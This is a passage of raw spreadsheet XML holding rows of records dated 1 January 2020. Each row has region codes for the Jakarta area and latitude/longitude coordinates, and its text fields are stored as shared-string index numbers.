        <v>18285</v>
      </c>
      <c r="Y21" t="str">
        <f t="shared" si="0"/>
        <v>-6.16260,106.76545</v>
      </c>
    </row>
    <row r="22" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A22">
        <v>95593</v>
      </c>
      <c r="B22" s="1">
        <v>43831</v>
      </c>
      <c r="C22" s="2">
        <v>0.15077546296296296</v>
      </c>
      <c r="D22" t="s">
        <v>85</v>
      </c>
      <c r="E22" t="s">
        <v>23</v>
      </c>
      <c r="F22" t="s">
        <v>151</v>
      </c>
      <c r="G22" t="s">
        <v>152</v>
      </c>
      <c r="H22" t="s">
        <v>26</v>
      </c>
      <c r="J22" t="s">
        <v>153</v>
      </c>
      <c r="K22" t="s">
        <v>154</v>
      </c>
      <c r="L22" t="s">
        <v>155</v>
      </c>
      <c r="M22">
        <v>3173080001</v>
      </c>
      <c r="N22">
        <v>3173080</v>
      </c>
      <c r="O22">
        <v>3173</v>
      </c>
      <c r="P22">
        <v>31</v>
      </c>
      <c r="Q22" t="s">
        <v>156</v>
      </c>
      <c r="R22" t="s">
        <v>157</v>
      </c>
      <c r="S22" t="s">
        <v>62</v>
      </c>
      <c r="T22" t="s">
        <v>33</v>
      </c>
      <c r="U22" s="5">
        <v>10681166</v>
      </c>
      <c r="V22" s="5" t="s">
        <v>14473</v>
      </c>
      <c r="W22" s="5">
        <v>-618362</v>
      </c>
      <c r="X22" t="s">
        <v>18286</v>
      </c>
      <c r="Y22" t="str">
        <f t="shared" si="0"/>
        <v>-6.18362,106.81166</v>
      </c>
    </row>
    <row r="23" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A23">
        <v>95626</v>
      </c>
      <c r="B23" s="1">
        <v>43831</v>
      </c>
      <c r="C23" s="2">
        <v>0.16128472222222223</v>
      </c>
      <c r="D23" t="s">
        <v>22</v>
      </c>
      <c r="E23" t="s">
        <v>23</v>
      </c>
      <c r="F23" t="s">
        <v>158</v>
      </c>
      <c r="H23" t="s">
        <v>26</v>
      </c>
      <c r="I23" t="s">
        <v>159</v>
      </c>
      <c r="J23" t="s">
        <v>160</v>
      </c>
      <c r="L23" t="s">
        <v>161</v>
      </c>
      <c r="M23">
        <v>3171040001</v>
      </c>
      <c r="N23">
        <v>3171040</v>
      </c>
      <c r="O23">
        <v>3171</v>
      </c>
      <c r="P23">
        <v>31</v>
      </c>
      <c r="Q23" t="s">
        <v>162</v>
      </c>
      <c r="R23" t="s">
        <v>163</v>
      </c>
      <c r="S23" t="s">
        <v>108</v>
      </c>
      <c r="T23" t="s">
        <v>33</v>
      </c>
      <c r="U23" s="5">
        <v>10677164</v>
      </c>
      <c r="V23" s="5" t="s">
        <v>14474</v>
      </c>
      <c r="W23" s="5">
        <v>-626131</v>
      </c>
      <c r="X23" t="s">
        <v>18287</v>
      </c>
      <c r="Y23" t="str">
        <f t="shared" si="0"/>
        <v>-6.26131,106.77164</v>
      </c>
    </row>
    <row r="24" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A24">
        <v>95706</v>
      </c>
      <c r="B24" s="1">
        <v>43831</v>
      </c>
      <c r="C24" s="2">
        <v>0.1736574074074074</v>
      </c>
      <c r="D24" t="s">
        <v>22</v>
      </c>
      <c r="E24" t="s">
        <v>23</v>
      </c>
      <c r="F24" t="s">
        <v>164</v>
      </c>
      <c r="G24" t="s">
        <v>165</v>
      </c>
      <c r="H24" t="s">
        <v>26</v>
      </c>
      <c r="I24" t="s">
        <v>166</v>
      </c>
      <c r="J24" t="s">
        <v>37</v>
      </c>
      <c r="L24" t="s">
        <v>167</v>
      </c>
      <c r="M24">
        <v>3674060008</v>
      </c>
      <c r="N24">
        <v>3674060</v>
      </c>
      <c r="O24">
        <v>3674</v>
      </c>
      <c r="P24">
        <v>36</v>
      </c>
      <c r="Q24" t="s">
        <v>168</v>
      </c>
      <c r="R24" t="s">
        <v>169</v>
      </c>
      <c r="S24" t="s">
        <v>170</v>
      </c>
      <c r="T24" t="s">
        <v>171</v>
      </c>
      <c r="U24" s="5">
        <v>10672077</v>
      </c>
      <c r="V24" s="5" t="s">
        <v>14475</v>
      </c>
      <c r="W24" s="5">
        <v>-626202</v>
      </c>
      <c r="X24" t="s">
        <v>18288</v>
      </c>
      <c r="Y24" t="str">
        <f t="shared" si="0"/>
        <v>-6.26202,106.72077</v>
      </c>
    </row>
    <row r="25" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A25">
        <v>95723</v>
      </c>
      <c r="B25" s="1">
        <v>43831</v>
      </c>
      <c r="C25" s="2">
        <v>0.17652777777777776</v>
      </c>
      <c r="D25" t="s">
        <v>22</v>
      </c>
      <c r="E25" t="s">
        <v>23</v>
      </c>
      <c r="F25" t="s">
        <v>172</v>
      </c>
      <c r="H25" t="s">
        <v>26</v>
      </c>
      <c r="I25" t="s">
        <v>166</v>
      </c>
      <c r="J25" t="s">
        <v>37</v>
      </c>
      <c r="L25" t="s">
        <v>173</v>
      </c>
      <c r="M25">
        <v>3275040007</v>
      </c>
      <c r="N25">
        <v>3275040</v>
      </c>
      <c r="O25">
        <v>3275</v>
      </c>
      <c r="P25">
        <v>32</v>
      </c>
      <c r="Q25" t="s">
        <v>99</v>
      </c>
      <c r="R25" t="s">
        <v>100</v>
      </c>
      <c r="S25" t="s">
        <v>41</v>
      </c>
      <c r="T25" t="s">
        <v>42</v>
      </c>
      <c r="U25" s="5">
        <v>10702553</v>
      </c>
      <c r="V25" s="5" t="s">
        <v>14476</v>
      </c>
      <c r="W25" s="5">
        <v>-622893</v>
      </c>
      <c r="X25" t="s">
        <v>18289</v>
      </c>
      <c r="Y25" t="str">
        <f t="shared" si="0"/>
        <v>-6.22893,107.02553</v>
      </c>
    </row>
    <row r="26" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A26">
        <v>95726</v>
      </c>
      <c r="B26" s="1">
        <v>43831</v>
      </c>
      <c r="C26" s="2">
        <v>0.14902777777777779</v>
      </c>
      <c r="D26" t="s">
        <v>85</v>
      </c>
      <c r="E26" t="s">
        <v>23</v>
      </c>
      <c r="F26" t="s">
        <v>174</v>
      </c>
      <c r="G26" t="s">
        <v>175</v>
      </c>
      <c r="H26" t="s">
        <v>26</v>
      </c>
      <c r="J26" t="s">
        <v>176</v>
      </c>
      <c r="K26" t="s">
        <v>177</v>
      </c>
      <c r="L26" t="s">
        <v>178</v>
      </c>
      <c r="M26">
        <v>3173020001</v>
      </c>
      <c r="N26">
        <v>3173020</v>
      </c>
      <c r="O26">
        <v>3173</v>
      </c>
      <c r="P26">
        <v>31</v>
      </c>
      <c r="Q26" t="s">
        <v>179</v>
      </c>
      <c r="R26" t="s">
        <v>179</v>
      </c>
      <c r="S26" t="s">
        <v>62</v>
      </c>
      <c r="T26" t="s">
        <v>33</v>
      </c>
      <c r="U26" s="5">
        <v>10682717</v>
      </c>
      <c r="V26" s="5" t="s">
        <v>14477</v>
      </c>
      <c r="W26" s="5">
        <v>-620248</v>
      </c>
      <c r="X26" t="s">
        <v>18290</v>
      </c>
      <c r="Y26" t="str">
        <f t="shared" si="0"/>
        <v>-6.20248,106.82717</v>
      </c>
    </row>
    <row r="27" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A27">
        <v>95738</v>
      </c>
      <c r="B27" s="1">
        <v>43831</v>
      </c>
      <c r="C27" s="2">
        <v>0.17806712962962964</v>
      </c>
      <c r="D27" t="s">
        <v>22</v>
      </c>
      <c r="E27" t="s">
        <v>23</v>
      </c>
      <c r="F27" t="s">
        <v>180</v>
      </c>
      <c r="H27" t="s">
        <v>26</v>
      </c>
      <c r="I27" t="s">
        <v>181</v>
      </c>
      <c r="J27" t="s">
        <v>37</v>
      </c>
      <c r="L27" t="s">
        <v>182</v>
      </c>
      <c r="M27">
        <v>3276030008</v>
      </c>
      <c r="N27">
        <v>3276030</v>
      </c>
      <c r="O27">
        <v>3276</v>
      </c>
      <c r="P27">
        <v>32</v>
      </c>
      <c r="Q27" t="s">
        <v>183</v>
      </c>
      <c r="R27" t="s">
        <v>184</v>
      </c>
      <c r="S27" t="s">
        <v>185</v>
      </c>
      <c r="T27" t="s">
        <v>42</v>
      </c>
      <c r="U27" s="5">
        <v>10684160</v>
      </c>
      <c r="V27" s="5" t="s">
        <v>14478</v>
      </c>
      <c r="W27" s="5">
        <v>-639824</v>
      </c>
      <c r="X27" t="s">
        <v>18291</v>
      </c>
      <c r="Y27" t="str">
        <f t="shared" si="0"/>
        <v>-6.39824,106.84160</v>
      </c>
    </row>
    <row r="28" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A28">
        <v>95759</v>
      </c>
      <c r="B28" s="1">
        <v>43831</v>
      </c>
      <c r="C28" s="2">
        <v>0.15746527777777777</v>
      </c>
      <c r="D28" t="s">
        <v>85</v>
      </c>
      <c r="E28" t="s">
        <v>23</v>
      </c>
      <c r="F28" t="s">
        <v>186</v>
      </c>
      <c r="G28" t="s">
        <v>187</v>
      </c>
      <c r="H28" t="s">
        <v>26</v>
      </c>
      <c r="J28" t="s">
        <v>37</v>
      </c>
      <c r="K28" t="s">
        <v>188</v>
      </c>
      <c r="L28" t="s">
        <v>189</v>
      </c>
      <c r="M28">
        <v>3674060002</v>
      </c>
      <c r="N28">
        <v>3674060</v>
      </c>
      <c r="O28">
        <v>3674</v>
      </c>
      <c r="P28">
        <v>36</v>
      </c>
      <c r="Q28" t="s">
        <v>190</v>
      </c>
      <c r="R28" t="s">
        <v>169</v>
      </c>
      <c r="S28" t="s">
        <v>170</v>
      </c>
      <c r="T28" t="s">
        <v>171</v>
      </c>
      <c r="U28" s="5">
        <v>10668569</v>
      </c>
      <c r="V28" s="5" t="s">
        <v>14479</v>
      </c>
      <c r="W28" s="5">
        <v>-625710</v>
      </c>
      <c r="X28" t="s">
        <v>18292</v>
      </c>
      <c r="Y28" t="str">
        <f t="shared" si="0"/>
        <v>-6.25710,106.68569</v>
      </c>
    </row>
    <row r="29" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A29">
        <v>95760</v>
      </c>
      <c r="B29" s="1">
        <v>43831</v>
      </c>
      <c r="C29" s="2">
        <v>0.18013888888888888</v>
      </c>
      <c r="D29" t="s">
        <v>22</v>
      </c>
      <c r="E29" t="s">
        <v>23</v>
      </c>
      <c r="F29" t="s">
        <v>191</v>
      </c>
      <c r="G29" t="s">
        <v>192</v>
      </c>
      <c r="H29" t="s">
        <v>26</v>
      </c>
      <c r="I29" t="s">
        <v>193</v>
      </c>
      <c r="J29" t="s">
        <v>37</v>
      </c>
      <c r="L29" t="s">
        <v>194</v>
      </c>
      <c r="M29">
        <v>3674060007</v>
      </c>
      <c r="N29">
        <v>3674060</v>
      </c>
      <c r="O29">
        <v>3674</v>
      </c>
      <c r="P29">
        <v>36</v>
      </c>
      <c r="Q29" t="s">
        <v>169</v>
      </c>
      <c r="R29" t="s">
        <v>169</v>
      </c>
      <c r="S29" t="s">
        <v>170</v>
      </c>
      <c r="T29" t="s">
        <v>171</v>
      </c>
      <c r="U29" s="5">
        <v>10670425</v>
      </c>
      <c r="V29" s="5" t="s">
        <v>14480</v>
      </c>
      <c r="W29" s="5">
        <v>-625988</v>
      </c>
      <c r="X29" t="s">
        <v>18293</v>
      </c>
      <c r="Y29" t="str">
        <f t="shared" si="0"/>
        <v>-6.25988,106.70425</v>
      </c>
    </row>
    <row r="30" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A30">
        <v>95820</v>
      </c>
      <c r="B30" s="1">
        <v>43831</v>
      </c>
      <c r="C30" s="2">
        <v>0.18355324074074075</v>
      </c>
      <c r="D30" t="s">
        <v>22</v>
      </c>
      <c r="E30" t="s">
        <v>23</v>
      </c>
      <c r="F30" t="s">
        <v>195</v>
      </c>
      <c r="G30" t="s">
        <v>196</v>
      </c>
      <c r="H30" t="s">
        <v>26</v>
      </c>
      <c r="I30" t="s">
        <v>197</v>
      </c>
      <c r="J30" t="s">
        <v>37</v>
      </c>
      <c r="L30" t="s">
        <v>198</v>
      </c>
      <c r="M30">
        <v>3671010002</v>
      </c>
      <c r="N30">
        <v>3671010</v>
      </c>
      <c r="O30">
        <v>3671</v>
      </c>
      <c r="P30">
        <v>36</v>
      </c>
      <c r="Q30" t="s">
        <v>199</v>
      </c>
      <c r="R30" t="s">
        <v>200</v>
      </c>
      <c r="S30" t="s">
        <v>201</v>
      </c>
      <c r="T30" t="s">
        <v>171</v>
      </c>
      <c r="U30" s="5">
        <v>10670047</v>
      </c>
      <c r="V30" s="5" t="s">
        <v>14481</v>
      </c>
      <c r="W30" s="5">
        <v>-624377</v>
      </c>
      <c r="X30" t="s">
        <v>18294</v>
      </c>
      <c r="Y30" t="str">
        <f t="shared" si="0"/>
        <v>-6.24377,106.70047</v>
      </c>
    </row>
    <row r="31" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A31">
        <v>96051</v>
      </c>
      <c r="B31" s="1">
        <v>43831</v>
      </c>
      <c r="C31" s="2">
        <v>0.19984953703703703</v>
      </c>
      <c r="D31" t="s">
        <v>22</v>
      </c>
      <c r="E31" t="s">
        <v>23</v>
      </c>
      <c r="F31" t="s">
        <v>202</v>
      </c>
      <c r="G31" t="s">
        <v>203</v>
      </c>
      <c r="H31" t="s">
        <v>26</v>
      </c>
      <c r="I31" t="s">
        <v>27</v>
      </c>
      <c r="J31" t="s">
        <v>37</v>
      </c>
      <c r="L31" t="s">
        <v>204</v>
      </c>
      <c r="M31">
        <v>3674060003</v>
      </c>
      <c r="N31">
        <v>3674060</v>
      </c>
      <c r="O31">
        <v>3674</v>
      </c>
      <c r="P31">
        <v>36</v>
      </c>
      <c r="Q31" t="s">
        <v>205</v>
      </c>
      <c r="R31" t="s">
        <v>169</v>
      </c>
      <c r="S31" t="s">
        <v>170</v>
      </c>
      <c r="T31" t="s">
        <v>171</v>
      </c>
      <c r="U31" s="5">
        <v>10670164</v>
      </c>
      <c r="V31" s="5" t="s">
        <v>14482</v>
      </c>
      <c r="W31" s="5">
        <v>-626009</v>
      </c>
      <c r="X31" t="s">
        <v>18295</v>
      </c>
      <c r="Y31" t="str">
        <f t="shared" si="0"/>
        <v>-6.26009,106.70164</v>
      </c>
    </row>
    <row r="32" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A32">
        <v>96072</v>
      </c>
      <c r="B32" s="1">
        <v>43831</v>
      </c>
      <c r="C32" s="2">
        <v>0.20281249999999998</v>
      </c>
      <c r="D32" t="s">
        <v>22</v>
      </c>
      <c r="E32" t="s">
        <v>23</v>
      </c>
      <c r="F32" t="s">
        <v>206</v>
      </c>
      <c r="G32" t="s">
        <v>207</v>
      </c>
      <c r="H32" t="s">
        <v>26</v>
      </c>
      <c r="I32" t="s">
        <v>27</v>
      </c>
      <c r="J32" t="s">
        <v>37</v>
      </c>
      <c r="L32" t="s">
        <v>208</v>
      </c>
      <c r="M32">
        <v>3674060003</v>
      </c>
      <c r="N32">
        <v>3674060</v>
      </c>
      <c r="O32">
        <v>3674</v>
      </c>
      <c r="P32">
        <v>36</v>
      </c>
      <c r="Q32" t="s">
        <v>205</v>
      </c>
      <c r="R32" t="s">
        <v>169</v>
      </c>
      <c r="S32" t="s">
        <v>170</v>
      </c>
      <c r="T32" t="s">
        <v>171</v>
      </c>
      <c r="U32" s="5">
        <v>10670307</v>
      </c>
      <c r="V32" s="5" t="s">
        <v>14483</v>
      </c>
      <c r="W32" s="5">
        <v>-626040</v>
      </c>
      <c r="X32" t="s">
        <v>18296</v>
      </c>
      <c r="Y32" t="str">
        <f t="shared" si="0"/>
        <v>-6.26040,106.70307</v>
      </c>
    </row>
    <row r="33" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A33">
        <v>96145</v>
      </c>
      <c r="B33" s="1">
        <v>43831</v>
      </c>
      <c r="C33" s="2">
        <v>0.20940972222222221</v>
      </c>
      <c r="D33" t="s">
        <v>22</v>
      </c>
      <c r="E33" t="s">
        <v>23</v>
      </c>
      <c r="F33" t="s">
        <v>209</v>
      </c>
      <c r="G33" t="s">
        <v>210</v>
      </c>
      <c r="H33" t="s">
        <v>26</v>
      </c>
      <c r="I33" t="s">
        <v>166</v>
      </c>
      <c r="J33" t="s">
        <v>37</v>
      </c>
      <c r="L33" t="s">
        <v>211</v>
      </c>
      <c r="M33">
        <v>3276061001</v>
      </c>
      <c r="N33">
        <v>3276061</v>
      </c>
      <c r="O33">
        <v>3276</v>
      </c>
      <c r="P33">
        <v>32</v>
      </c>
      <c r="Q33" t="s">
        <v>212</v>
      </c>
      <c r="R33" t="s">
        <v>212</v>
      </c>
      <c r="S33" t="s">
        <v>185</v>
      </c>
      <c r="T33" t="s">
        <v>42</v>
      </c>
      <c r="U33" s="5">
        <v>10678416</v>
      </c>
      <c r="V33" s="5" t="s">
        <v>14484</v>
      </c>
      <c r="W33" s="5">
        <v>-634131</v>
      </c>
      <c r="X33" t="s">
        <v>18297</v>
      </c>
      <c r="Y33" t="str">
        <f t="shared" si="0"/>
        <v>-6.34131,106.78416</v>
      </c>
    </row>
    <row r="34" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A34">
        <v>96164</v>
      </c>
      <c r="B34" s="1">
        <v>43831</v>
      </c>
      <c r="C34" s="2">
        <v>0.17163194444444443</v>
      </c>
      <c r="D34" t="s">
        <v>85</v>
      </c>
      <c r="E34" t="s">
        <v>23</v>
      </c>
      <c r="F34" t="s">
        <v>213</v>
      </c>
      <c r="G34" t="s">
        <v>214</v>
      </c>
      <c r="H34" t="s">
        <v>26</v>
      </c>
      <c r="J34" t="s">
        <v>215</v>
      </c>
      <c r="K34" t="s">
        <v>216</v>
      </c>
      <c r="L34" t="s">
        <v>217</v>
      </c>
      <c r="M34">
        <v>3171070005</v>
      </c>
      <c r="N34">
        <v>3171070</v>
      </c>
      <c r="O34">
        <v>3171</v>
      </c>
      <c r="P34">
        <v>31</v>
      </c>
      <c r="Q34" t="s">
        <v>218</v>
      </c>
      <c r="R34" t="s">
        <v>121</v>
      </c>
      <c r="S34" t="s">
        <v>108</v>
      </c>
      <c r="T34" t="s">
        <v>33</v>
      </c>
      <c r="U34" s="5">
        <v>10682298</v>
      </c>
      <c r="V34" s="5" t="s">
        <v>14485</v>
      </c>
      <c r="W34" s="5">
        <v>-624023</v>
      </c>
      <c r="X34" t="s">
        <v>18298</v>
      </c>
      <c r="Y34" t="str">
        <f t="shared" si="0"/>
        <v>-6.24023,106.82298</v>
      </c>
    </row>
    <row r="35" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A35">
        <v>96218</v>
      </c>
      <c r="B35" s="1">
        <v>43831</v>
      </c>
      <c r="C35" s="2">
        <v>0.17678240740740739</v>
      </c>
      <c r="D35" t="s">
        <v>85</v>
      </c>
      <c r="E35" t="s">
        <v>23</v>
      </c>
      <c r="F35" t="s">
        <v>219</v>
      </c>
      <c r="G35" t="s">
        <v>220</v>
      </c>
      <c r="H35" t="s">
        <v>26</v>
      </c>
      <c r="J35" t="s">
        <v>221</v>
      </c>
      <c r="K35" t="s">
        <v>222</v>
      </c>
      <c r="L35" t="s">
        <v>223</v>
      </c>
      <c r="M35">
        <v>3171070005</v>
      </c>
      <c r="N35">
        <v>3171070</v>
      </c>
      <c r="O35">
        <v>3171</v>
      </c>
      <c r="P35">
        <v>31</v>
      </c>
      <c r="Q35" t="s">
        <v>218</v>
      </c>
      <c r="R35" t="s">
        <v>121</v>
      </c>
      <c r="S35" t="s">
        <v>108</v>
      </c>
      <c r="T35" t="s">
        <v>33</v>
      </c>
      <c r="U35" s="5">
        <v>10682674</v>
      </c>
      <c r="V35" s="5" t="s">
        <v>14486</v>
      </c>
      <c r="W35" s="5">
        <v>-623683</v>
      </c>
      <c r="X35" t="s">
        <v>18299</v>
      </c>
      <c r="Y35" t="str">
        <f t="shared" si="0"/>
        <v>-6.23683,106.82674</v>
      </c>
    </row>
    <row r="36" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A36">
        <v>96271</v>
      </c>
      <c r="B36" s="1">
        <v>43831</v>
      </c>
      <c r="C36" s="2">
        <v>0.18189814814814817</v>
      </c>
      <c r="D36" t="s">
        <v>85</v>
      </c>
      <c r="E36" t="s">
        <v>23</v>
      </c>
      <c r="F36" t="s">
        <v>224</v>
      </c>
      <c r="G36" t="s">
        <v>225</v>
      </c>
      <c r="H36" t="s">
        <v>26</v>
      </c>
      <c r="J36" t="s">
        <v>37</v>
      </c>
      <c r="K36" t="s">
        <v>226</v>
      </c>
      <c r="L36" t="s">
        <v>227</v>
      </c>
      <c r="M36">
        <v>3674040007</v>
      </c>
      <c r="N36">
        <v>3674040</v>
      </c>
      <c r="O36">
        <v>3674</v>
      </c>
      <c r="P36">
        <v>36</v>
      </c>
      <c r="Q36" t="s">
        <v>228</v>
      </c>
      <c r="R36" t="s">
        <v>229</v>
      </c>
      <c r="S36" t="s">
        <v>170</v>
      </c>
      <c r="T36" t="s">
        <v>171</v>
      </c>
      <c r="U36" s="5">
        <v>10674954</v>
      </c>
      <c r="V36" s="5" t="s">
        <v>14487</v>
      </c>
      <c r="W36" s="5">
        <v>-631471</v>
      </c>
      <c r="X36" t="s">
        <v>18300</v>
      </c>
      <c r="Y36" t="str">
        <f t="shared" si="0"/>
        <v>-6.31471,106.74954</v>
      </c>
    </row>
    <row r="37" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A37">
        <v>96339</v>
      </c>
      <c r="B37" s="1">
        <v>43831</v>
      </c>
      <c r="C37" s="2">
        <v>0.22018518518518518</v>
      </c>
      <c r="D37" t="s">
        <v>22</v>
      </c>
      <c r="E37" t="s">
        <v>23</v>
      </c>
      <c r="F37" t="s">
        <v>230</v>
      </c>
      <c r="G37" t="s">
        <v>231</v>
      </c>
      <c r="H37" t="s">
        <v>26</v>
      </c>
      <c r="I37" t="s">
        <v>193</v>
      </c>
      <c r="J37" t="s">
        <v>232</v>
      </c>
      <c r="L37" t="s">
        <v>233</v>
      </c>
      <c r="M37">
        <v>3174070001</v>
      </c>
      <c r="N37">
        <v>3174070</v>
      </c>
      <c r="O37">
        <v>3174</v>
      </c>
      <c r="P37">
        <v>31</v>
      </c>
      <c r="Q37" t="s">
        <v>83</v>
      </c>
      <c r="R37" t="s">
        <v>84</v>
      </c>
      <c r="S37" t="s">
        <v>32</v>
      </c>
      <c r="T37" t="s">
        <v>33</v>
      </c>
      <c r="U37" s="5">
        <v>10672111</v>
      </c>
      <c r="V37" s="5" t="s">
        <v>14488</v>
      </c>
      <c r="W37" s="5">
        <v>-615970</v>
      </c>
      <c r="X37" t="s">
        <v>18301</v>
      </c>
      <c r="Y37" t="str">
        <f t="shared" si="0"/>
        <v>-6.15970,106.72111</v>
      </c>
    </row>
    <row r="38" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A38">
        <v>96340</v>
      </c>
      <c r="B38" s="1">
        <v>43831</v>
      </c>
      <c r="C38" s="2">
        <v>0.20444444444444443</v>
      </c>
      <c r="D38" t="s">
        <v>85</v>
      </c>
      <c r="E38" t="s">
        <v>23</v>
      </c>
      <c r="F38" t="s">
        <v>234</v>
      </c>
      <c r="G38" t="s">
        <v>235</v>
      </c>
      <c r="H38" t="s">
        <v>26</v>
      </c>
      <c r="J38" t="s">
        <v>236</v>
      </c>
      <c r="K38" t="s">
        <v>237</v>
      </c>
      <c r="L38" t="s">
        <v>238</v>
      </c>
      <c r="M38">
        <v>3174010001</v>
      </c>
      <c r="N38">
        <v>3174010</v>
      </c>
      <c r="O38">
        <v>3174</v>
      </c>
      <c r="P38">
        <v>31</v>
      </c>
      <c r="Q38" t="s">
        <v>239</v>
      </c>
      <c r="R38" t="s">
        <v>69</v>
      </c>
      <c r="S38" t="s">
        <v>32</v>
      </c>
      <c r="T38" t="s">
        <v>33</v>
      </c>
      <c r="U38" s="5">
        <v>10674783</v>
      </c>
      <c r="V38" s="5" t="s">
        <v>14489</v>
      </c>
      <c r="W38" s="5">
        <v>-621766</v>
      </c>
      <c r="X38" t="s">
        <v>18302</v>
      </c>
      <c r="Y38" t="str">
        <f t="shared" si="0"/>
        <v>-6.21766,106.74783</v>
      </c>
    </row>
    <row r="39" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A39">
        <v>96461</v>
      </c>
      <c r="B39" s="1">
        <v>43831</v>
      </c>
      <c r="C39" s="2">
        <v>0.22474537037037037</v>
      </c>
      <c r="D39" t="s">
        <v>22</v>
      </c>
      <c r="E39" t="s">
        <v>23</v>
      </c>
      <c r="F39" t="s">
        <v>240</v>
      </c>
      <c r="G39" t="s">
        <v>241</v>
      </c>
      <c r="H39" t="s">
        <v>26</v>
      </c>
      <c r="I39" t="s">
        <v>242</v>
      </c>
      <c r="J39" t="s">
        <v>37</v>
      </c>
      <c r="L39" t="s">
        <v>243</v>
      </c>
      <c r="M39">
        <v>3674030003</v>
      </c>
      <c r="N39">
        <v>3674030</v>
      </c>
      <c r="O39">
        <v>3674</v>
      </c>
      <c r="P39">
        <v>36</v>
      </c>
      <c r="Q39" t="s">
        <v>244</v>
      </c>
      <c r="R39" t="s">
        <v>245</v>
      </c>
      <c r="S39" t="s">
        <v>170</v>
      </c>
      <c r="T39" t="s">
        <v>171</v>
      </c>
      <c r="U39" s="5">
        <v>10674098</v>
      </c>
      <c r="V39" s="5" t="s">
        <v>14490</v>
      </c>
      <c r="W39" s="5">
        <v>-634358</v>
      </c>
      <c r="X39" t="s">
        <v>18303</v>
      </c>
      <c r="Y39" t="str">
        <f t="shared" si="0"/>
        <v>-6.34358,106.74098</v>
      </c>
    </row>
    <row r="40" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A40">
        <v>96570</v>
      </c>
      <c r="B40" s="1">
        <v>43831</v>
      </c>
      <c r="C40" s="2">
        <v>0.22907407407407407</v>
      </c>
      <c r="D40" t="s">
        <v>22</v>
      </c>
      <c r="E40" t="s">
        <v>23</v>
      </c>
      <c r="F40" t="s">
        <v>246</v>
      </c>
      <c r="G40" t="s">
        <v>247</v>
      </c>
      <c r="H40" t="s">
        <v>26</v>
      </c>
      <c r="I40" t="s">
        <v>248</v>
      </c>
      <c r="J40" t="s">
        <v>249</v>
      </c>
      <c r="L40" t="s">
        <v>250</v>
      </c>
      <c r="M40">
        <v>3174010005</v>
      </c>
      <c r="N40">
        <v>3174010</v>
      </c>
      <c r="O40">
        <v>3174</v>
      </c>
      <c r="P40">
        <v>31</v>
      </c>
      <c r="Q40" t="s">
        <v>251</v>
      </c>
      <c r="R40" t="s">
        <v>69</v>
      </c>
      <c r="S40" t="s">
        <v>32</v>
      </c>
      <c r="T40" t="s">
        <v>33</v>
      </c>
      <c r="U40" s="5">
        <v>10674752</v>
      </c>
      <c r="V40" s="5" t="s">
        <v>14491</v>
      </c>
      <c r="W40" s="5">
        <v>-618715</v>
      </c>
      <c r="X40" t="s">
        <v>18304</v>
      </c>
      <c r="Y40" t="str">
        <f t="shared" si="0"/>
        <v>-6.18715,106.74752</v>
      </c>
    </row>
    <row r="41" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A41">
        <v>96667</v>
      </c>
      <c r="B41" s="1">
        <v>43831</v>
      </c>
      <c r="C41" s="2">
        <v>0.23393518518518519</v>
      </c>
      <c r="D41" t="s">
        <v>22</v>
      </c>
      <c r="E41" t="s">
        <v>23</v>
      </c>
      <c r="F41" t="s">
        <v>252</v>
      </c>
      <c r="G41" t="s">
        <v>253</v>
      </c>
      <c r="H41" t="s">
        <v>26</v>
      </c>
      <c r="I41" t="s">
        <v>254</v>
      </c>
      <c r="J41" t="s">
        <v>37</v>
      </c>
      <c r="L41" t="s">
        <v>255</v>
      </c>
      <c r="M41">
        <v>3603051003</v>
      </c>
      <c r="N41">
        <v>3603051</v>
      </c>
      <c r="O41">
        <v>3603</v>
      </c>
      <c r="P41">
        <v>36</v>
      </c>
      <c r="Q41" t="s">
        <v>256</v>
      </c>
      <c r="R41" t="s">
        <v>257</v>
      </c>
      <c r="S41" t="s">
        <v>201</v>
      </c>
      <c r="T41" t="s">
        <v>171</v>
      </c>
      <c r="U41" s="5">
        <v>10663012</v>
      </c>
      <c r="V41" s="5" t="s">
        <v>14492</v>
      </c>
      <c r="W41" s="5">
        <v>-622795</v>
      </c>
      <c r="X41" t="s">
        <v>18305</v>
      </c>
      <c r="Y41" t="str">
        <f t="shared" si="0"/>
        <v>-6.22795,106.63012</v>
      </c>
    </row>
    <row r="42" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A42">
        <v>97017</v>
      </c>
      <c r="B42" s="1">
        <v>43831</v>
      </c>
      <c r="C42" s="2">
        <v>0.24458333333333335</v>
      </c>
      <c r="D42" t="s">
        <v>85</v>
      </c>
      <c r="E42" t="s">
        <v>23</v>
      </c>
      <c r="F42" t="s">
        <v>258</v>
      </c>
      <c r="G42" t="s">
        <v>259</v>
      </c>
      <c r="H42" t="s">
        <v>26</v>
      </c>
      <c r="J42" t="s">
        <v>260</v>
      </c>
      <c r="K42" t="s">
        <v>261</v>
      </c>
      <c r="L42" t="s">
        <v>262</v>
      </c>
      <c r="M42">
        <v>3171010003</v>
      </c>
      <c r="N42">
        <v>3171010</v>
      </c>
      <c r="O42">
        <v>3171</v>
      </c>
      <c r="P42">
        <v>31</v>
      </c>
      <c r="Q42" t="s">
        <v>263</v>
      </c>
      <c r="R42" t="s">
        <v>264</v>
      </c>
      <c r="S42" t="s">
        <v>108</v>
      </c>
      <c r="T42" t="s">
        <v>33</v>
      </c>
      <c r="U42" s="5">
        <v>10680234</v>
      </c>
      <c r="V42" s="5" t="s">
        <v>14493</v>
      </c>
      <c r="W42" s="5">
        <v>-634129</v>
      </c>
      <c r="X42" t="s">
        <v>18306</v>
      </c>
      <c r="Y42" t="str">
        <f t="shared" si="0"/>
        <v>-6.34129,106.80234</v>
      </c>
    </row>
